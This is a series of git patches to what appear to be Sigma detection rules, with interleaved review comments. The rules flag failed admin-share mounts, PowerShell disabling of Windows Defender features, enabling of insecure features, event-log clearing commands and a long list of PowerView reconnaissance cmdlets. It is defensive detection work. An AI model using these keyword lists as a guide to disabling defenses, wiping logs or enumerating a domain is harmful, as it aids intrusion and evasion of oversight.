From 3a020ce4997d0b1e05fae771ad215632d47071ff Mon Sep 17 00:00:00 2001
From: FabFaeb
Date: Wed, 31 Aug 2022 09:57:09 +0200
Subject: [PATCH 001/120] added "failed admin share mount" rule
---
 .../win_susp_failed_admin_share_mount.yml | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml
diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml
new file mode 100644
index 000000000..6d6470981
--- /dev/null
+++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml
@@ -0,0 +1,28 @@
+title: Repeated failed mounting of administrative share
+id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb
+description: Detects failed (outgoing) attempts to mount an administrative share
+author: Fabian Franz
+status: experimental
+level: medium
+references:
+ - https://twitter.com/moti_b/status/1032645458634653697
+ - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5
+date: 2022/08/30
+modified: 2022/08/30
+logsource:
+ product: windows
+ service: smbclient-security
+detection:
+ selection:
+ EventID: 31010
+ ShareName|endswith: '$'
+ condition:
+ - selection | count() > 10
+fields:
+ - ShareName
+falsepositives:
+ - Legitimate administrative activity
+ - Faulty scripts
+tags:
+ - attack.t1021.002
+ - attack.lateral_movement
\ No newline at end of file
From df2ef5a2ee7c2a35d4cb93c45efd8f46a4bf8533 Mon Sep 17 00:00:00 2001
From: FabFaeb
Date: Wed, 31 Aug 2022 09:59:29 +0200
Subject: [PATCH 002/120] added missing newline
---
 .../builtin/smbclient/win_susp_failed_admin_share_mount.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
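Review bot: `condition: - selection | count() > 10` aggregates every matching event with no `by` clause, so the threshold is reached by eleven failed `$`-share mounts anywhere in the fleet rather than by repeated failures from one client, which is what the title and description describe. Grouping the aggregation on the originating host (`selection | count() by Computer > 10`, using whichever host field the smbclient-security source exposes) keeps the stated intent; the `timeframe: 10m` added in patch 006 bounds the window but leaves this grouping gap in place.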
diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml index 6d6470981..2fbc5497e 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -25,4 +25,4 @@ falsepositives: - Faulty scripts tags: - attack.t1021.002 - - attack.lateral_movement \ No newline at end of file + - attack.lateral_movement From ab9e15f4563b899953b6b7ce628714ef00a2cfa4 Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Thu, 1 Sep 2022 17:05:32 +0200 Subject: [PATCH 003/120] fix title --- .../builtin/smbclient/win_susp_failed_admin_share_mount.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml index 2fbc5497e..d18cc79b7 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -1,6 +1,6 @@ -title: Repeated failed mounting of administrative share +title: Failed Mounting of Administrative Share id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb -description: Detects failed (outgoing) attempts to mount an administrative share +description: Detects repeated failed (outgoing) attempts to mount an administrative share author: Fabian Franz status: experimental level: medium From 3d9d90f43efc41692047e3ca0ba527f87c78b1f1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 2 Sep 2022 17:24:28 +0200 Subject: [PATCH 004/120] Update win_susp_failed_admin_share_mount.yml --- .../smbclient/win_susp_failed_admin_share_mount.yml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) 
diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml index d18cc79b7..9ff0745f6 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -1,12 +1,14 @@ -title: Failed Mounting of Administrative Share +title: Multiple Failed Mount Attempts of Admin Share id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb description: Detects repeated failed (outgoing) attempts to mount an administrative share author: Fabian Franz status: experimental -level: medium references: - https://twitter.com/moti_b/status/1032645458634653697 - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5 +tags: + - attack.t1021.002 + - attack.lateral_movement date: 2022/08/30 modified: 2022/08/30 logsource: @@ -16,13 +18,10 @@ detection: selection: EventID: 31010 ShareName|endswith: '$' - condition: - - selection | count() > 10 + condition: selection | count() > 10 fields: - ShareName falsepositives: - Legitimate administrative activity - Faulty scripts -tags: - - attack.t1021.002 - - attack.lateral_movement +level: medium From a8eb1ba9723ff94c8cd4bf7545ce393d24bc06af Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Wed, 7 Sep 2022 16:52:09 +0200 Subject: [PATCH 005/120] rename rule --- ...share_mount.yml => win_susp_failed_hidden_share_mount.yml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename rules/windows/builtin/smbclient/{win_susp_failed_admin_share_mount.yml => win_susp_failed_hidden_share_mount.yml} (91%) 
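Review bot: `modified: 2022/08/30` is carried unchanged as context in the first hunk although this commit renames the rule, relocates `level` and `tags` and collapses the condition to a scalar; Sigma expects `modified` to track every content change, so it should become `modified: 2022/09/02` here. The same omission applies to patch 003 (title and description) and patch 006 (timeframe).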
diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml similarity index 91% rename from rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml rename to rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml index d18cc79b7..5b3c831e7 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -1,6 +1,6 @@ -title: Failed Mounting of Administrative Share +title: Failed Mounting of Hidden Share id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb -description: Detects repeated failed (outgoing) attempts to mount an administrative share +description: Detects repeated failed (outgoing) attempts to mount an hidden share author: Fabian Franz status: experimental level: medium From 860c45a0380c0814f292831996864b10d36fc6bc Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 9 Sep 2022 17:07:45 +0200 Subject: [PATCH 006/120] added time frame --- .../builtin/smbclient/win_susp_failed_hidden_share_mount.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml index 1089f8c9c..ab736de4d 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -16,8 +16,8 @@ detection: selection: EventID: 31010 ShareName|endswith: '$' - condition: - - selection | count() > 10 + timeframe: 10m + condition: selection | count() > 10 fields: - ShareName falsepositives: From 486fdabe340bd344900de3a36d1e9cd102f5a777 Mon Sep 17 00:00:00 2001 
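Review bot: The added description line reads `Detects repeated failed (outgoing) attempts to mount an hidden share`; it should say `a hidden share`. Separately, this patch's pre-image (`index d18cc79b7..5b3c831e7`) is the same blob patch 004 started from, so the hunk still removes `title: Failed Mounting of Administrative Share` and shows `level: medium` in its original position, both already changed by patch 004, and patch 006 then re-applies the scalar `condition`. Applied in the listed order this hunk would not apply cleanly; the series appears to have been flattened from two branches and probably needs rebasing before review.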
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 10 Sep 2022 19:15:36 +0200 Subject: [PATCH 007/120] Add posh_ps_disable_windowsoptionalfeature --- ...posh_ps_disable_windowsoptionalfeature.yml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml new file mode 100644 index 000000000..601f6b71f --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -0,0 +1,35 @@ +title: Disable-WindowsOptionalFeature Command PowerShell +id: 99c4658d-2c5e-4d87-828d-7c066ca537c3 +status: experimental +author: frack113 +date: 2021/09/10 +description: | + Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +references: + - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md + - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps +tags: + - attack.collection + - attack.t1119 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_cmd: + ScriptBlockText|contains|all: + - 'Disable-WindowsOptionalFeature' + - '-Online' + - '-FeatureName' + selection_feature: + # Add any important windows features + ScriptBlockText|contains: + - 'Windows-Defender-Gui' + - 'Windows-Defender-Features' + - 'Windows-Defender' + - 'Windows-Defender-ApplicationGuard' + condition: all of selection* +falsepositives: + - Unknown +level: high 
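Review bot: In `selection_feature`, `'Windows-Defender'` is a substring of the other three values, so under `ScriptBlockText|contains` the list is equivalent to that single entry and `Windows-Defender-Gui`, `Windows-Defender-Features` and `Windows-Defender-ApplicationGuard` never add a match. Either reduce the list to `- 'Windows-Defender'` or, if the longer names are meant to document the features of interest, move them into the comment; the current `# Add any important windows features` could become `# matched as substrings: 'Windows-Defender' already covers the -Gui/-Features/-ApplicationGuard variants`. `falsepositives: - Unknown` is also thin for a high-level rule; provisioning scripts that strip Defender before installing another endpoint product are a plausible benign source and worth naming once confirmed.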
From 5996fbf4c9b4d5502272780d558ade92eb4e7828 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 10 Sep 2022 19:23:58 +0200 Subject: [PATCH 008/120] Fix tag --- .../posh_ps_disable_windowsoptionalfeature.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml index 601f6b71f..0bee0b729 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -2,7 +2,7 @@ title: Disable-WindowsOptionalFeature Command PowerShell id: 99c4658d-2c5e-4d87-828d-7c066ca537c3 status: experimental author: frack113 -date: 2021/09/10 +date: 2022/09/10 description: | Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images @@ -10,8 +10,8 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps tags: - - attack.collection - - attack.t1119 + - attack.defense_evasion + - attack.t1562.001 logsource: product: windows category: ps_script From 51076b20783ecb833c5ccd217589fa577db4765a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 11 Sep 2022 19:29:15 +0200 Subject: [PATCH 009/120] Update posh_ps_disable_windowsoptionalfeature.yml --- .../powershell_script/posh_ps_disable_windowsoptionalfeature.yml | 1 + 1 file changed, 1 insertion(+) 
diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml index 0bee0b729..df3121e56 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -29,6 +29,7 @@ detection: - 'Windows-Defender-Features' - 'Windows-Defender' - 'Windows-Defender-ApplicationGuard' + #- 'Containers-DisposableClientVM' # Windows Sandbox condition: all of selection* falsepositives: - Unknown From f4da079d1358922856fbbbe1d7511b97c04ad978 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 11 Sep 2022 19:43:54 +0200 Subject: [PATCH 010/120] Add posh_ps_enable_windowsoptionalfeature --- .../posh_ps_enable_windowsoptionalfeature.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml new file mode 100644 index 000000000..c37b1dd75 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml 
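Review bot: The new `#- 'Containers-DisposableClientVM' # Windows Sandbox` parks a candidate value without recording why it is disabled, so a later editor cannot tell whether it was dropped for noise or simply not validated. Either remove it or state the reason, e.g. `# 'Containers-DisposableClientVM' (Windows Sandbox) deliberately excluded: <reason> - TODO confirm`; a space after `#` also matches the comment style used elsewhere in the file. The start of `selection_feature` lies before the hunk.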
@@ -0,0 +1,33 @@ +title: Enable-WindowsOptionalFeature Command PowerShell +id: 55c925c1-7195-426b-a136-a9396800e29b +status: experimental +author: frack113 +date: 2022/09/10 +description: | + Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +references: + - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps +tags: + - attack.defense_evasion +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_cmd: + ScriptBlockText|contains|all: + - 'Enable-WindowsOptionalFeature' + - '-Online' + - '-FeatureName' + selection_feature: + # Add any unsecure windows features + ScriptBlockText|contains: + - 'TelnetServer' + - 'Internet-Explorer-Optional-amd64' + - 'TFTP' + - 'SMB1Protocol' + condition: all of selection* +falsepositives: + - Unknown +level: medium From 0caeaaa12224700f0f502b9077568b19be893d83 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 10:02:32 +0200 Subject: [PATCH 011/120] Update rules --- ..._susp_prog_location_network_connection.yml | 50 +++++++++---------- .../proc_creation_win_susp_eventlog_clear.yml | 17 ++++--- 2 files changed, 34 insertions(+), 33 deletions(-) diff --git a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml index 2c87f50da..0df871e90 100755 --- a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml +++ b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml 
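Review bot: `tags:` carries only the tactic `attack.defense_evasion` with no technique id, while the sibling Disable rule (patch 008) pairs the tactic with `attack.t1562.001`; enabling TelnetServer, TFTP or SMB1Protocol is not obviously defense evasion, so the mapping should be decided explicitly and a technique added, or the tactic replaced. The description is a verbatim copy of the Disable rule's and reads as a fragment (`Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.`); something like `Detects use of the Enable-WindowsOptionalFeature cmdlet (DISM module) to turn on legacy or insecure Windows features such as SMB1 or Telnet` states what the selection actually looks for. The comment `# Add any unsecure windows features` should read `# Add any insecure Windows features`.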
@@ -4,36 +4,36 @@ status: test description: Detects programs with network connections running in suspicious files system locations author: Florian Roth, Tim Shelton references: - - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo + - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo date: 2017/03/19 modified: 2022/05/26 logsource: - category: network_connection - product: windows - definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events' + category: network_connection + product: windows + definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events' detection: - selection: - - Image|contains: + selection: + - Image|contains: # - '\ProgramData\' # too many false positives, e.g. with Webex for Windows - - '\Users\All Users\' - - '\Users\Default\' - - '\Users\Public\' - - '\Users\Contacts\' - - '\Users\Searches\' - - '\config\systemprofile\' - - '\Windows\Fonts\' - - '\Windows\IME\' - - '\Windows\addins\' - - Image|endswith: - - '\$Recycle.bin' - - Image|startswith: - - 'C:\Perflogs\' - false_positive1: - Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location - condition: selection and not 1 of false_positive* + - '\Users\All Users\' + - '\Users\Default\' + - '\Users\Public\' + - '\Users\Contacts\' + - '\Users\Searches\' + - '\config\systemprofile\' + - '\Windows\Fonts\' + - '\Windows\IME\' + - '\Windows\addins\' + - Image|endswith: + - '\$Recycle.bin' + - Image|startswith: + - 'C:\Perflogs\' + false_positive1: + Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location + condition: selection and not 1 of false_positive* falsepositives: - - Unknown + - Unknown level: high tags: - - attack.command_and_control - - attack.t1105 + - attack.command_and_control + - attack.t1105 
diff --git a/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml b/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml index da3d019ac..322528935 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html date: 2019/09/26 -modified: 2022/07/14 +modified: 2022/09/12 logsource: category: process_creation product: windows @@ -15,18 +15,19 @@ detection: selection_wevtutil: Image|endswith: '\wevtutil.exe' CommandLine|contains: - - 'clear-log' # clears specified log - - ' cl ' # short version of 'clear-log' - - 'set-log' # modifies config of specified log. could be uset to set it to a tiny size - - ' sl ' # short version of 'set-log' + - 'clear-log ' # clears specified log + - ' cl ' # short version of 'clear-log' + - 'set-log ' # modifies config of specified log. could be uset to set it to a tiny size + - ' sl ' # short version of 'set-log' selection_other_ps: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains: - - 'Clear-EventLog' - - 'Remove-EventLog' - - 'Limit-EventLog' + - 'Clear-EventLog ' + - 'Remove-EventLog ' + - 'Limit-EventLog ' + - 'Clear-WinEvent ' selection_other_wmic: Image|endswith: '\wmic.exe' CommandLine|contains: ' ClearEventLog ' From 6fa682b619e5751d37b6e75dfe265bfc447c8e16 Mon Sep 17 00:00:00 2001 
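Review bot: The trailing space now required by each `CommandLine|contains` value (`'clear-log '`, `'set-log '`, `'Clear-EventLog '`, …) narrows the match: a cmdlet name followed directly by a line break, `;`, a quote or a back-tick continuation, or one that ends the command line, no longer triggers. If that is an intentional precision trade-off the hunk should say so, e.g. `# trailing space is deliberate: require an argument to follow so longer identifiers that merely begin with the name do not match`; the same values are copied into the new `posh_ps_susp_clear_eventlog.yml` in patch 012, where the trade-off applies to script-block text as well. I could not confirm `Clear-WinEvent` as a built-in cmdlet (`Get-WinEvent` is); if it comes from the cited tweet or a third-party module, a short comment naming the source would stop a future cleanup from dropping it as a typo.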
From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 10:02:36 +0200 Subject: [PATCH 012/120] Create posh_ps_susp_clear_eventlog.yml --- .../posh_ps_susp_clear_eventlog.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml new file mode 100644 index 000000000..49a838e80 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml @@ -0,0 +1,31 @@ +title: Suspicious Eventlog Clear +id: 0f017df3-8f5a-414f-ad6b-24aff1128278 +related: + - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 + type: derived +description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the windows event logs +references: + - https://twitter.com/oroneequalsone/status/1568432028361830402 + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md + - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html +status: experimental +author: Nasreddine Bencherchali +date: 2022/09/12 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection: + ScriptBlockText|contains: + - 'Clear-EventLog ' + - 'Remove-EventLog ' + - 'Limit-EventLog ' + - 'Clear-WinEvent ' + condition: selection +falsepositives: + - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate +level: medium +tags: + - attack.defense_evasion + - attack.t1070.001 From 8a504bee9ef34b1e1591514006b8e18287844e51 Mon Sep 17 00:00:00 2001 
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 10:49:14 +0200 Subject: [PATCH 013/120] Add %tmp% env variable --- ...osh_ps_powerview_malicious_commandlets.yml | 250 +++++++++--------- ...tsadmin_download_uncommon_targetfolder.yml | 2 + ...eation_win_cmd_redirection_susp_folder.yml | 1 + ...c_creation_win_netsh_fw_add_susp_image.yml | 83 +++--- ...n_win_reg_import_from_suspicious_paths.yml | 2 + .../proc_creation_win_susp_curl_download.yml | 3 +- ...on_win_susp_invoke_webrequest_download.yml | 2 + ...oc_creation_win_susp_mofcomp_execution.yml | 3 +- .../proc_creation_win_susp_recon.yml | 5 +- .../proc_creation_win_susp_sharpview.yml | 14 +- ...ation_win_susp_target_location_shell32.yml | 2 + ...roc_creation_win_susp_wmic_proc_create.yml | 3 +- ...rsistence_com_hijacking_susp_locations.yml | 2 + ...egistry_set_susp_app_paths_persistence.yml | 2 + .../registry_set_susp_run_key_img_folder.yml | 16 +- 15 files changed, 207 insertions(+), 183 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml index 332337938..12701d630 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml 
@@ -18,131 +18,131 @@ logsource: category: ps_script definition: Script Block Logging must be enabled detection: - selection: - ScriptBlockText|contains: - - Export-PowerViewCSV - - Get-IPAddress - - Resolve-IPAddress - - Convert-NameToSid - - ConvertTo-SID - - Convert-ADName - - ConvertFrom-UACValue - - Add-RemoteConnection - - Remove-RemoteConnection - - Invoke-UserImpersonation - - Invoke-RevertToSelf - - Request-SPNTicket - - Get-DomainSPNTicket - - Invoke-Kerberoast - - Get-PathAcl - - Get-DNSZone - - Get-DomainDNSZone - - Get-DNSRecord - - Get-DomainDNSRecord - - Get-NetDomain - - Get-Domain - - Get-NetDomainController - - Get-DomainController - - Get-NetForest - - Get-Forest - - Get-NetForestDomain - - Get-ForestDomain - - Get-NetForestCatalog - - Get-ForestGlobalCatalog - - Find-DomainObjectPropertyOutlier - - Get-NetUser - - Get-DomainUser - - New-DomainUser - - Set-DomainUserPassword - - Get-UserEvent - - Get-DomainUserEvent - - Get-NetComputer - - Get-DomainComputer - - Get-ADObject - - Get-DomainObject - - Set-ADObject - - Set-DomainObject - - Get-ObjectAcl - - Get-DomainObjectAcl - - Add-ObjectAcl - - Add-DomainObjectAcl - - Invoke-ACLScanner - - Find-InterestingDomainAcl - - Get-NetOU - - Get-DomainOU - - Get-NetSite - - Get-DomainSite - - Get-NetSubnet - - Get-DomainSubnet - - Get-DomainSID - - Get-NetGroup - - Get-DomainGroup - - New-DomainGroup - - Find-ManagedSecurityGroups - - Get-DomainManagedSecurityGroup - - Get-NetGroupMember - - Get-DomainGroupMember - - Add-DomainGroupMember - - Get-NetFileServer - - Get-DomainFileServer - - Get-DFSshare - - Get-DomainDFSShare - - Get-NetGPO - - Get-DomainGPO - - Get-NetGPOGroup - - Get-DomainGPOLocalGroup - - Find-GPOLocation - - Get-DomainGPOUserLocalGroupMapping - - Find-GPOComputerAdmin - - Get-DomainGPOComputerLocalGroupMapping - - Get-DomainPolicy - - Get-NetLocalGroup - - Get-NetLocalGroupMember - - Get-NetShare - - Get-NetLoggedon - - Get-NetSession - - Get-LoggedOnLocal - - Get-RegLoggedOn - - 
Get-NetRDPSession - - Invoke-CheckLocalAdminAccess - - Test-AdminAccess - - Get-SiteName - - Get-NetComputerSiteName - - Get-Proxy - - Get-WMIRegProxy - - Get-LastLoggedOn - - Get-WMIRegLastLoggedOn - - Get-CachedRDPConnection - - Get-WMIRegCachedRDPConnection - - Get-RegistryMountedDrive - - Get-WMIRegMountedDrive - - Get-NetProcess - - Get-WMIProcess - - Find-InterestingFile - - Invoke-UserHunter - - Find-DomainUserLocation - - Invoke-ProcessHunter - - Find-DomainProcess - - Invoke-EventHunter - - Find-DomainUserEvent - - Invoke-ShareFinder - - Find-DomainShare - - Invoke-FileFinder - - Find-InterestingDomainShareFile - - Find-LocalAdminAccess - - Invoke-EnumerateLocalAdmin - - Find-DomainLocalGroupMember - - Get-NetDomainTrust - - Get-DomainTrust - - Get-NetForestTrust - - Get-ForestTrust - - Find-ForeignUser - - Get-DomainForeignUser - - Find-ForeignGroup - - Get-DomainForeignGroupMember - - Invoke-MapDomainTrust - - Get-DomainTrustMapping - condition: selection + selection: + ScriptBlockText|contains: + - Export-PowerViewCSV + - Get-IPAddress + - Resolve-IPAddress + - Convert-NameToSid + - ConvertTo-SID + - Convert-ADName + - ConvertFrom-UACValue + - Add-RemoteConnection + - Remove-RemoteConnection + - Invoke-UserImpersonation + - Invoke-RevertToSelf + - Request-SPNTicket + - Get-DomainSPNTicket + - Invoke-Kerberoast + - Get-PathAcl + - Get-DNSZone + - Get-DomainDNSZone + - Get-DNSRecord + - Get-DomainDNSRecord + - Get-NetDomain + - Get-Domain + - Get-NetDomainController + - Get-DomainController + - Get-NetForest + - Get-Forest + - Get-NetForestDomain + - Get-ForestDomain + - Get-NetForestCatalog + - Get-ForestGlobalCatalog + - Find-DomainObjectPropertyOutlier + - Get-NetUser + - Get-DomainUser + - New-DomainUser + - Set-DomainUserPassword + - Get-UserEvent + - Get-DomainUserEvent + - Get-NetComputer + - Get-DomainComputer + - Get-ADObject + - Get-DomainObject + - Set-ADObject + - Set-DomainObject + - Get-ObjectAcl + - Get-DomainObjectAcl + - Add-ObjectAcl + - 
Add-DomainObjectAcl + - Invoke-ACLScanner + - Find-InterestingDomainAcl + - Get-NetOU + - Get-DomainOU + - Get-NetSite + - Get-DomainSite + - Get-NetSubnet + - Get-DomainSubnet + - Get-DomainSID + - Get-NetGroup + - Get-DomainGroup + - New-DomainGroup + - Find-ManagedSecurityGroups + - Get-DomainManagedSecurityGroup + - Get-NetGroupMember + - Get-DomainGroupMember + - Add-DomainGroupMember + - Get-NetFileServer + - Get-DomainFileServer + - Get-DFSshare + - Get-DomainDFSShare + - Get-NetGPO + - Get-DomainGPO + - Get-NetGPOGroup + - Get-DomainGPOLocalGroup + - Find-GPOLocation + - Get-DomainGPOUserLocalGroupMapping + - Find-GPOComputerAdmin + - Get-DomainGPOComputerLocalGroupMapping + - Get-DomainPolicy + - Get-NetLocalGroup + - Get-NetLocalGroupMember + - Get-NetShare + - Get-NetLoggedon + - Get-NetSession + - Get-LoggedOnLocal + - Get-RegLoggedOn + - Get-NetRDPSession + - Invoke-CheckLocalAdminAccess + - Test-AdminAccess + - Get-SiteName + - Get-NetComputerSiteName + - Get-Proxy + - Get-WMIRegProxy + - Get-LastLoggedOn + - Get-WMIRegLastLoggedOn + - Get-CachedRDPConnection + - Get-WMIRegCachedRDPConnection + - Get-RegistryMountedDrive + - Get-WMIRegMountedDrive + - Get-NetProcess + - Get-WMIProcess + - Find-InterestingFile + - Invoke-UserHunter + - Find-DomainUserLocation + - Invoke-ProcessHunter + - Find-DomainProcess + - Invoke-EventHunter + - Find-DomainUserEvent + - Invoke-ShareFinder + - Find-DomainShare + - Invoke-FileFinder + - Find-InterestingDomainShareFile + - Find-LocalAdminAccess + - Invoke-EnumerateLocalAdmin + - Find-DomainLocalGroupMember + - Get-NetDomainTrust + - Get-DomainTrust + - Get-NetForestTrust + - Get-ForestTrust + - Find-ForeignUser + - Get-DomainForeignUser + - Find-ForeignGroup + - Get-DomainForeignGroupMember + 